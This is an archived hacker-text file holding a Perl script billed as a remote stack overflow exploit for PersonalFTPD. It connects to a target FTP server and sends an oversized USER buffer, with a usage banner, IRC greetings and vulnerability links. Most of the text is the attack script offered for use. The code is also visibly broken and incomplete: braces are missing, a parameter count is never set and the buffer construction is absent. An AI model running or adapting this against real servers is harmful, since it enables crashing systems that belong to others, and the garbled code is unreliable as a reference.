TUCoPS :: Linux :: Apps N-Z :: bt142.txt

Remote Stack Overflow exploit for Personal FTPD


use IO::Socket;


#                                                        #

# Remote Stack Overflow sploit for PersonalFTPD          #

# If wanna talk with me find me on irc                   #

# irc.irochka.net #dwc, #global, #phreack                #

# ###################################################### #

# thanx to kabuto, drG4njubas, fnq                       #

# gr33tz to dhg, gipshack, rsteam, blacktigerz           #

# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #

# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #

# ###################################################### #

# Vulnerability links:                                   #

# http://security.nnov.ru/search/document.asp?docid=4309 #

# http://www.securityfocus.com/archive/1/316958          #

#                                                        #


$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";

print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";

print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";

print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";



if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 

size\n\n"; exit; }

while ($n<$count_param) {

if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}

if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}

if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}




sub connect 


$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", 

Proto => "tcp")

        || die "Can\'t connect to $server port $port\n";

print $sock "USER $buffer\n";

print "Buffer has beens sended...";




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